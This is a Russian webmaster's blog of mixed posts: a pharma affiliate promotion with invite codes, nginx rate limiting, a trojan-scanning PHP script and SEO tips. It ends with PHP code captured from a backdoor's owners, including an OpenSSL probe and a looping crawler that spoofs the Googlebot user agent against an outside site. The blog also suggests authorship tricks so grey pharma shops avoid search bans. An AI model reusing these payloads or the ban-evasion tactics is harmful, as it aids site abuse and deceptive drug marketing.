Из ТОПа вебмастеров партнёрки русского фармацевтического трафика (таблетки для потенции) выудил две для меня новых партнёрки.
Одна из которых — CyberJay.org (о второй в следующем посте)
Инвайты для регистрации ниже.

Что интересного, по сравнению с уже проверенным ДокторДиком (DD)?
Во-первых — это новый ниши: Попперсы и Карепрост.
Как раз недавно думал о нишах для расширения онлайн шопов — и вот предложение само идёт в руки 🙂
Тем не менее, первый шоп сделал по препаратам для потенции (для сравнения с DD) — tab4sex.ru
Дизайн взял один из последних дефолтных, контент пока не правил.

Второе — тяжелый движек — целая куча файлов! фактически полноценный сайт на Yii фремворке (в принципе оно неплохо — будет чего глянуть в плане программирования в yii).
Все настройки сайта делаются локально — метатеги, контент, фотки, … Всё очень гибко! — меняй всё как пожелаешь!

Цены вроде чуток получше чем в DD.
Быстрого заказа в 1 клик нет! — минус!
Для заказа не обязательно указывать мыло — плюс!
При заказе сразу пришло СМС с номером заказа — плюс!
Кроме почты есть доставка Курьерской службой СПСР — но ИМХО дорого.
Для стимулирования вебмастеров проводят конкурсы — плюс.
Процент от продаж — сразу 40% — плюс!
Реферальский такой же — 5%

Регистрация ТОЛЬКО по инвайтам!
Желающим попробовать — вот несколько штук:

HQt9suRmbaCIzszT

A39PsOEzAzxwV8SN

HF3POFl5Uu23ije6

2NnBbkBgu7iwPNX

se2oLkHYrFGZNOaY

JEJUEM5BehF8lrZN

KcdE3PyRHcUDepGx

ESbxynkLOTsUwyGy

1WXT2PYCRpqSQP3b

3wTs2AjcthKIKCen

У одного из клиентов сайт частенько сайт начал «лежать», изучение логов показало множественные запросы (более 10) с одного и того-же IP адреса, которые и давали нагрузку на сайт.
Фронтендом у клиента стоял nginx — поэтому заблокировать подобную активность не составило никакого труда.
В этом мне помогли директивы limit_zone и limit_req.
Собственно, первое — в секцию httpd добавляем запись, ограничивающую активность до 2х запросов в секунду
limit_req_zone $binary_remote_addr zone=one:10m rate=2r/s;
В секцию обработки динамики собственно активируем нашу запись (зону созданную в httpd)
limit_req zone=one burst=3;

Вуаля, от «лоховских» ботов атакующих с одного и того-же IP мы защищены!
Кому интересно поподробнее — запрос «limit_req_zone» в помощь 🙂

P.S.
Чтоб случайно не «резануть» ботов, рекомендую добавить в robots.txt паузу в запросах от ботов в 1 секунду
Crawl-delay: 1

С недавних пор перестал работать мой сриптик поиска изменений на хостинге (трудно недооценить его полезность в поиске троянов).
Кстати, понял я это уже слишком поздно и для начала пришлось писать скрипт удаления троянов 🙁
Итак, скрипт не пашет — почему я так и не понял, вернее понял почему, но как это вылечить — не совсем (пришлось заменить фукнцию чтения файлов директории на другую).

Исходник старого скприта.
Исходник нового скрипта.

Если кратко, то:
конструкцию

$dir = dir($cat);
while($file = $dir->read()) {
if ($file=='.' or $file=='..') continue;
if (is_dir($cat.'/'.$file)) { ....


пришлось заменить на

if (is_dir($cat)) {
if ($dh = opendir($cat)) {
while (($file = readdir($dh)) !== false) {
if ($file=='.' or $file=='..') continue;
if (filetype($cat.'/'.$file)=='dir') { ......


Продолжаем изобретать велосипед (скрипт поиска и замены с secu.ru у меня не отработал), поэтому модифицировал свой для вхождения и замены в подпапках.
Исходник лежит в новоиспечённом разделе Инструменты.
Так же пришлось подкинуть скрипту памяти и убрать ограничение по времени — иначе лично у меня скрипт затыкался.
Запускал я его по ssh консольно.
Лично я использовал для поиска и замены троянской иньекции а-ля eval(base64_decode()) — в скрипте увидите где эта строчка 🙂
Сцуки — задолбали уже джумлу пежить, и отследить то не могу дыры 🙁

Решил сваять отдельную страничку для размещения различных полезных фишек для администрирования и поисковой оптимизации.
Частенько приходится пользоваться и каждый раз ищу одно и то же.
Так всё необходимое будет под рукой 🙂
Страничку прикрепил в верхнее меню — Инструменты.

P.S.
У кого есть чем поделиться — скидывайте ссылочки, размещу.

Сегодня помогал искать сайт коллеге по приблизительному поисковому запросу и его внешнему описанию — пока нашел, пришлось открыть штук 40 сайтов.
Тут и пришла в голову мысль — почему в поисковой выдаче не делают снимок сайта?!
Я бы сделал небольшую картиночку (а лучше возможность настройки размеров превью снимка сайта), при наведении на которую открывалась бы более большая превью копия.
Таким образом и на сайт заходить не нужно (некоторые сайты открываются довольно медленно) и внешний вид сайта виден сразу!
ИМХО очень удобная фишка! я бы пользовался!

Кто знает куда в Яндекс/Гугл написать, чтоб реализовали?
И премировали за хорошую идею 🙂

P.S.
Для подтверждения авторства статьи и для установления моей фотки в выдаче (статья «Ваше фото напротив сайта в выдаче Google поиска»
оставлю ссылочку на профиль в Goole+
Автор идеи: Алексей Вдовин

и посмотрю — что из этого получиться … а должно получиться как у ребят из ТОПа выдачи по запросу «снимок сайта в поисковой выдаче» (по идее данная статья должна в ТОП-1 попасть после нескольких АПов)

Добавлено позже:
По ссылке указанной в статье всё подтвердилось, авторство и фотка появилась — но в выдаче пока тишина… Ждёмс апдейта…

P.S.S
Интересно, а если такие же фишки сделать по коммерческим запросам — ведь явно кликабельность должна повыситься!
Думаю можно попробовать на одном из двух, созданных недавно шопов по дженерикам — apteka4y.ru или pharma4y.ru — фотку фотогеничного доктора 🙂
И вообще — пора делать уникальный фарма сайт с подтверждением авторства всех материалов в обоих поисковиках! хрен тогда забанят!
Например — «Отзывы Доктора Дика о препаратах для повышения потенции» 🙂
Ещё бы в Яше такое реализовали — вообще бомба бы была!

Добавлено позже:
Оказалось у Гугла такая фишка уже есть
Но чего-то не могу её врубить 🙁

Ещё позже:
В выдачу гугл меня уже поставил, но почему-то без фотки 🙁
Попробую другую ссылку поставить — проверке — авторство подтверждено и сниппед с картинкой, а вот при нажатии
«Подтверждение авторства по электронной почте» получаю:

Адрес эл. почты автора не подтвержден.
Адрес электронной почты в домене gtalex.ru подтвержден для этого профиля: Да
Ссылка «Мои публикации» на сайт gtalex.ru из профиля Google+: Да
Автор определен автоматически: Не найдено.

Чего-то хозяева бэкдора активизировались прямо — вчера домены парсили, сегодня тестят работу с гугулом по SSL.
Собственно, код (имхо полезный):


$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/dev/null", "a")
);
$cwd = '/tmp';
$process = proc_open('openssl s_client -crlf -connect pop.gmail.com:995', $descriptorspec, $pipes, $cwd, $env);
sleep(1);
if (is_resource($process)) {
// fwrite($pipes[0], 'USER hello');
fclose($pipes[0]);
$res=stream_get_contents($pipes[1]);
// var_dump($res);
if (stristr($res,"OK Gpop ready")){
echo md5("openssl");
}
fclose($pipes[1]);
$return_value = proc_close($process);
}

Общеизвестная информация по «нашим» доменам:
.RU https://partner.r01.ru/ru_domains.gz
.SU https://partner.r01.ru/su_domains.gz
.РФ https://partner.r01.ru/rf_domains.gz

Международники http://premiumdrops.com/zones.html
НО доступ 25$ в месяц — дороговато…

Так же у меня на «поплавке» висит переделанный бэкдор, который по идее должен исполнять посланный ему PHP код,
я же его просто изучаю и делюсь с тобой, уважаемый читатель — думаю у меня на это есть полное право 😉

Сегодня пришел такой довольно интересный код

set_time_limit(0);
ignore_user_abort(1);
if (@ini_get('open_basedir') or @ini_get('safe_mode')){exit;}
function curlu ($url,$ua,$cookie,$ref,$post) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 2);
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
if (!empty($ref)) {
curl_setopt($ch, CURLOPT_REFERER, $ref);
}
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_NOBODY, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_MAXREDIRS, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
if (!empty($post)) {
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
}
if (!empty($cookie)) {
curl_setopt($ch, CURLOPT_COOKIE,$cookie);
}
$response = curl_exec($ch);
$header=substr($response,0,curl_getinfo($ch,CURLINFO_HEADER_SIZE));
$body=substr($response,curl_getinfo($ch,CURLINFO_HEADER_SIZE));
$resp['page']=$body;
preg_match_all("/Set-Cookie: (.*?)=(.*?);/i",$header,$res);
$cookie='';
foreach ($res[1] as $key => $value) {
$cookie.= $value.'='.$res[2][$key].'; ';
};
$resp['cookie']=$cookie;
$err = curl_error($ch);
$resp['inf'] = curl_getinfo($ch);
print_r ($resp['inf']);
curl_close($ch);
return $resp;
}

$ua="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)";
for ($i=0;$i<100;$i++){ $p=curlu("http://domain-kb.com/sitemap-index-2013.xml",$ua,"","",""); preg_match_all("/(.*?)<\/loc>/",$p,$match);
foreach ($match[1] as $mu){
$p2=curlu($mu,$ua,"","","");
}
}